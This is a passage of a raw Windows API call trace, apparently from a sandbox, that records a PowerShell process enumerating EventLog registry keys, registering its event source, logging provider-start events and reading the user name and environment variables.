	[0415.594] CoTaskMemFree (pv=0x0) 
	[0415.594] CoTaskMemAlloc (cb=0x204) returned 0x194120
	[0415.594] RegEnumKeyExW (in: hKey=0x1c4, dwIndex=0x7, lpName=0x194120, lpcchName=0xcd168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xcd168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.594] CoTaskMemFree (pv=0x194120) 
	[0415.595] CoTaskMemFree (pv=0x0) 
	[0415.595] CoTaskMemAlloc (cb=0x204) returned 0x194120
	[0415.595] RegEnumKeyExW (in: hKey=0x1c4, dwIndex=0x8, lpName=0x194120, lpcchName=0xcd168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xcd168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.595] CoTaskMemFree (pv=0x194120) 
	[0415.595] CoTaskMemFree (pv=0x0) 
	[0415.595] RegOpenKeyExW (in: hKey=0x1c4, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1c8 | out: phkResult=0xcd1c8*=0x330) returned 0x0
	[0415.595] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1c8 | out: phkResult=0xcd1c8*=0x0) returned 0x2
	[0415.595] RegOpenKeyExW (in: hKey=0x1c4, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1c8 | out: phkResult=0xcd1c8*=0x334) returned 0x0
	[0415.595] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1c8 | out: phkResult=0xcd1c8*=0x0) returned 0x2
	[0415.595] RegOpenKeyExW (in: hKey=0x1c4, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1c8 | out: phkResult=0xcd1c8*=0x338) returned 0x0
	[0415.595] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1c8 | out: phkResult=0xcd1c8*=0x0) returned 0x2
	[0415.595] RegOpenKeyExW (in: hKey=0x1c4, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1c8 | out: phkResult=0xcd1c8*=0x33c) returned 0x0
	[0415.595] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1c8 | out: phkResult=0xcd1c8*=0x0) returned 0x2
	[0415.595] RegOpenKeyExW (in: hKey=0x1c4, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1c8 | out: phkResult=0xcd1c8*=0x2fc) returned 0x0
	[0415.595] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1c8 | out: phkResult=0xcd1c8*=0x0) returned 0x2
	[0415.596] RegOpenKeyExW (in: hKey=0x1c4, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1c8 | out: phkResult=0xcd1c8*=0x328) returned 0x0
	[0415.596] RegOpenKeyExW (in: hKey=0x328, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1c8 | out: phkResult=0xcd1c8*=0x0) returned 0x2
	[0415.596] RegOpenKeyExW (in: hKey=0x1c4, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1c8 | out: phkResult=0xcd1c8*=0x304) returned 0x0
	[0415.596] RegOpenKeyExW (in: hKey=0x304, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1c8 | out: phkResult=0xcd1c8*=0x0) returned 0x2
	[0415.596] RegOpenKeyExW (in: hKey=0x1c4, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1c8 | out: phkResult=0xcd1c8*=0x318) returned 0x0
	[0415.596] RegOpenKeyExW (in: hKey=0x318, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1c8 | out: phkResult=0xcd1c8*=0x0) returned 0x2
	[0415.596] RegOpenKeyExW (in: hKey=0x1c4, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1c8 | out: phkResult=0xcd1c8*=0x1c8) returned 0x0
	[0415.596] RegOpenKeyExW (in: hKey=0x1c8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1c8 | out: phkResult=0xcd1c8*=0x348) returned 0x0
	[0415.596] RegCloseKey (hKey=0x348) returned 0x0
	[0415.596] RegCloseKey (hKey=0x1c4) returned 0x0
	[0415.597] RegCloseKey (hKey=0x1c8) returned 0x0
	[0415.598] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd168 | out: phkResult=0xcd168*=0x1c8) returned 0x0
	[0415.598] RegQueryInfoKeyW (in: hKey=0x1c8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcd0dc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd0d8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcd0dc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd0d8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.598] CoTaskMemFree (pv=0x0) 
	[0415.598] CoTaskMemAlloc (cb=0x204) returned 0x194120
	[0415.598] RegEnumKeyExW (in: hKey=0x1c8, dwIndex=0x0, lpName=0x194120, lpcchName=0xcd168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xcd168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.598] CoTaskMemFree (pv=0x194120) 
	[0415.598] CoTaskMemFree (pv=0x0) 
	[0415.598] CoTaskMemAlloc (cb=0x204) returned 0x194120
	[0415.598] RegEnumKeyExW (in: hKey=0x1c8, dwIndex=0x1, lpName=0x194120, lpcchName=0xcd168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xcd168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.598] CoTaskMemFree (pv=0x194120) 
	[0415.598] CoTaskMemFree (pv=0x0) 
	[0415.598] CoTaskMemAlloc (cb=0x204) returned 0x194120
	[0415.598] RegEnumKeyExW (in: hKey=0x1c8, dwIndex=0x2, lpName=0x194120, lpcchName=0xcd168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xcd168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.598] CoTaskMemFree (pv=0x194120) 
	[0415.598] CoTaskMemFree (pv=0x0) 
	[0415.598] CoTaskMemAlloc (cb=0x204) returned 0x194120
	[0415.598] RegEnumKeyExW (in: hKey=0x1c8, dwIndex=0x3, lpName=0x194120, lpcchName=0xcd168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xcd168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.598] CoTaskMemFree (pv=0x194120) 
	[0415.598] CoTaskMemFree (pv=0x0) 
	[0415.598] CoTaskMemAlloc (cb=0x204) returned 0x194120
	[0415.598] RegEnumKeyExW (in: hKey=0x1c8, dwIndex=0x4, lpName=0x194120, lpcchName=0xcd168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xcd168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.598] CoTaskMemFree (pv=0x194120) 
	[0415.598] CoTaskMemFree (pv=0x0) 
	[0415.598] CoTaskMemAlloc (cb=0x204) returned 0x194120
	[0415.598] RegEnumKeyExW (in: hKey=0x1c8, dwIndex=0x5, lpName=0x194120, lpcchName=0xcd168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xcd168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.598] CoTaskMemFree (pv=0x194120) 
	[0415.598] CoTaskMemFree (pv=0x0) 
	[0415.598] CoTaskMemAlloc (cb=0x204) returned 0x194120
	[0415.599] RegEnumKeyExW (in: hKey=0x1c8, dwIndex=0x6, lpName=0x194120, lpcchName=0xcd168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xcd168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.599] CoTaskMemFree (pv=0x194120) 
	[0415.599] CoTaskMemFree (pv=0x0) 
	[0415.599] CoTaskMemAlloc (cb=0x204) returned 0x194120
	[0415.599] RegEnumKeyExW (in: hKey=0x1c8, dwIndex=0x7, lpName=0x194120, lpcchName=0xcd168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xcd168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.599] CoTaskMemFree (pv=0x194120) 
	[0415.599] CoTaskMemFree (pv=0x0) 
	[0415.599] CoTaskMemAlloc (cb=0x204) returned 0x194120
	[0415.599] RegEnumKeyExW (in: hKey=0x1c8, dwIndex=0x8, lpName=0x194120, lpcchName=0xcd168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xcd168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.599] CoTaskMemFree (pv=0x194120) 
	[0415.599] CoTaskMemFree (pv=0x0) 
	[0415.599] RegOpenKeyExW (in: hKey=0x1c8, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1c8 | out: phkResult=0xcd1c8*=0x1c4) returned 0x0
	[0415.599] RegOpenKeyExW (in: hKey=0x1c4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1c8 | out: phkResult=0xcd1c8*=0x0) returned 0x2
	[0415.599] RegOpenKeyExW (in: hKey=0x1c8, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1c8 | out: phkResult=0xcd1c8*=0x348) returned 0x0
	[0415.599] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1c8 | out: phkResult=0xcd1c8*=0x0) returned 0x2
	[0415.599] RegOpenKeyExW (in: hKey=0x1c8, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1c8 | out: phkResult=0xcd1c8*=0x34c) returned 0x0
	[0415.599] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1c8 | out: phkResult=0xcd1c8*=0x0) returned 0x2
	[0415.599] RegOpenKeyExW (in: hKey=0x1c8, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1c8 | out: phkResult=0xcd1c8*=0x350) returned 0x0
	[0415.600] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1c8 | out: phkResult=0xcd1c8*=0x0) returned 0x2
	[0415.600] RegOpenKeyExW (in: hKey=0x1c8, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1c8 | out: phkResult=0xcd1c8*=0x354) returned 0x0
	[0415.600] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1c8 | out: phkResult=0xcd1c8*=0x0) returned 0x2
	[0415.600] RegOpenKeyExW (in: hKey=0x1c8, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1c8 | out: phkResult=0xcd1c8*=0x358) returned 0x0
	[0415.600] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1c8 | out: phkResult=0xcd1c8*=0x0) returned 0x2
	[0415.600] RegOpenKeyExW (in: hKey=0x1c8, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1c8 | out: phkResult=0xcd1c8*=0x35c) returned 0x0
	[0415.600] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1c8 | out: phkResult=0xcd1c8*=0x0) returned 0x2
	[0415.600] RegOpenKeyExW (in: hKey=0x1c8, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1c8 | out: phkResult=0xcd1c8*=0x360) returned 0x0
	[0415.600] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1c8 | out: phkResult=0xcd1c8*=0x0) returned 0x2
	[0415.600] RegOpenKeyExW (in: hKey=0x1c8, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1c8 | out: phkResult=0xcd1c8*=0x364) returned 0x0
	[0415.600] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1c8 | out: phkResult=0xcd1c8*=0x368) returned 0x0
	[0415.600] RegCloseKey (hKey=0x368) returned 0x0
	[0415.601] RegCloseKey (hKey=0x1c8) returned 0x0
	[0415.601] RegCloseKey (hKey=0x364) returned 0x0
	[0415.602] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd138 | out: phkResult=0xcd138*=0x364) returned 0x0
	[0415.602] RegQueryInfoKeyW (in: hKey=0x364, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcd0ac, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd0a8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcd0ac*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd0a8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.602] CoTaskMemFree (pv=0x0) 
	[0415.602] CoTaskMemAlloc (cb=0x204) returned 0x194120
	[0415.602] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x0, lpName=0x194120, lpcchName=0xcd138, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xcd138, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.602] CoTaskMemFree (pv=0x194120) 
	[0415.602] CoTaskMemFree (pv=0x0) 
	[0415.602] CoTaskMemAlloc (cb=0x204) returned 0x194120
	[0415.602] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x1, lpName=0x194120, lpcchName=0xcd138, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xcd138, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.602] CoTaskMemFree (pv=0x194120) 
	[0415.602] CoTaskMemFree (pv=0x0) 
	[0415.602] CoTaskMemAlloc (cb=0x204) returned 0x194120
	[0415.602] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x2, lpName=0x194120, lpcchName=0xcd138, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xcd138, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.602] CoTaskMemFree (pv=0x194120) 
	[0415.602] CoTaskMemFree (pv=0x0) 
	[0415.602] CoTaskMemAlloc (cb=0x204) returned 0x194120
	[0415.602] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x3, lpName=0x194120, lpcchName=0xcd138, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xcd138, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.602] CoTaskMemFree (pv=0x194120) 
	[0415.602] CoTaskMemFree (pv=0x0) 
	[0415.602] CoTaskMemAlloc (cb=0x204) returned 0x194120
	[0415.602] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x4, lpName=0x194120, lpcchName=0xcd138, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xcd138, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.603] CoTaskMemFree (pv=0x194120) 
	[0415.603] CoTaskMemFree (pv=0x0) 
	[0415.603] CoTaskMemAlloc (cb=0x204) returned 0x194120
	[0415.603] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x5, lpName=0x194120, lpcchName=0xcd138, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xcd138, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.603] CoTaskMemFree (pv=0x194120) 
	[0415.603] CoTaskMemFree (pv=0x0) 
	[0415.603] CoTaskMemAlloc (cb=0x204) returned 0x194120
	[0415.603] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x6, lpName=0x194120, lpcchName=0xcd138, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xcd138, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.603] CoTaskMemFree (pv=0x194120) 
	[0415.603] CoTaskMemFree (pv=0x0) 
	[0415.603] CoTaskMemAlloc (cb=0x204) returned 0x194120
	[0415.603] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x7, lpName=0x194120, lpcchName=0xcd138, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xcd138, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.603] CoTaskMemFree (pv=0x194120) 
	[0415.603] CoTaskMemFree (pv=0x0) 
	[0415.603] CoTaskMemAlloc (cb=0x204) returned 0x194120
	[0415.603] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x8, lpName=0x194120, lpcchName=0xcd138, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xcd138, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.603] CoTaskMemFree (pv=0x194120) 
	[0415.603] CoTaskMemFree (pv=0x0) 
	[0415.603] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd198 | out: phkResult=0xcd198*=0x1c8) returned 0x0
	[0415.603] RegOpenKeyExW (in: hKey=0x1c8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd198 | out: phkResult=0xcd198*=0x0) returned 0x2
	[0415.603] RegOpenKeyExW (in: hKey=0x364, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd198 | out: phkResult=0xcd198*=0x368) returned 0x0
	[0415.603] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd198 | out: phkResult=0xcd198*=0x0) returned 0x2
	[0415.603] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd198 | out: phkResult=0xcd198*=0x36c) returned 0x0
	[0415.603] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd198 | out: phkResult=0xcd198*=0x0) returned 0x2
	[0415.604] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd198 | out: phkResult=0xcd198*=0x370) returned 0x0
	[0415.604] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd198 | out: phkResult=0xcd198*=0x0) returned 0x2
	[0415.604] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd198 | out: phkResult=0xcd198*=0x374) returned 0x0
	[0415.604] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd198 | out: phkResult=0xcd198*=0x0) returned 0x2
	[0415.604] RegOpenKeyExW (in: hKey=0x364, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd198 | out: phkResult=0xcd198*=0x378) returned 0x0
	[0415.604] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd198 | out: phkResult=0xcd198*=0x0) returned 0x2
	[0415.604] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd198 | out: phkResult=0xcd198*=0x37c) returned 0x0
	[0415.604] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd198 | out: phkResult=0xcd198*=0x0) returned 0x2
	[0415.604] RegOpenKeyExW (in: hKey=0x364, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd198 | out: phkResult=0xcd198*=0x380) returned 0x0
	[0415.604] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd198 | out: phkResult=0xcd198*=0x0) returned 0x2
	[0415.604] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd198 | out: phkResult=0xcd198*=0x384) returned 0x0
	[0415.604] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd198 | out: phkResult=0xcd198*=0x388) returned 0x0
	[0415.605] RegCloseKey (hKey=0x388) returned 0x0
	[0415.605] RegCloseKey (hKey=0x364) returned 0x0
	[0415.605] RegCloseKey (hKey=0x384) returned 0x0
	[0415.611] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b900008
	[0415.949] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2dc5358*="WSMan", lpRawData=0x2dc50c8) returned 1
	[0415.952] CoTaskMemAlloc (cb=0x104) returned 0x1ed820
	[0415.952] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ed820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0415.952] CoTaskMemFree (pv=0x1ed820) 
	[0415.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0415.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0415.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0415.955] CoTaskMemAlloc (cb=0x804) returned 0x1b784da0
	[0415.955] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b784da0, nSize=0xcd428 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd428) returned 0x1
	[0415.955] CoTaskMemFree (pv=0x1b784da0) 
	[0415.955] CoTaskMemAlloc (cb=0x204) returned 0x194120
	[0415.955] GetUserNameW (in: lpBuffer=0x194120, pcbBuffer=0xcd468 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd468) returned 1
	[0415.956] CoTaskMemFree (pv=0x194120) 
	[0415.956] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2dcad38*="Alias", lpRawData=0x2dcaac8) returned 1
	[0415.964] CoTaskMemAlloc (cb=0x104) returned 0x1ed820
	[0415.964] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ed820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0415.964] CoTaskMemFree (pv=0x1ed820) 
	[0415.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0415.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0415.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0415.966] CoTaskMemAlloc (cb=0x804) returned 0x1b784da0
	[0415.966] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b784da0, nSize=0xcd428 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd428) returned 0x1
	[0415.966] CoTaskMemFree (pv=0x1b784da0) 
	[0415.966] CoTaskMemAlloc (cb=0x204) returned 0x194120
	[0415.966] GetUserNameW (in: lpBuffer=0x194120, pcbBuffer=0xcd468 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd468) returned 1
	[0415.967] CoTaskMemFree (pv=0x194120) 
	[0415.967] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2dd0330*="Environment", lpRawData=0x2dd00c0) returned 1
	[0415.974] CoTaskMemAlloc (cb=0x104) returned 0x1ed820
	[0415.974] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ed820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0415.974] CoTaskMemFree (pv=0x1ed820) 
	[0415.975] CoTaskMemAlloc (cb=0x104) returned 0x1ed820
	[0415.975] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x1ed820, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0415.975] CoTaskMemFree (pv=0x1ed820) 
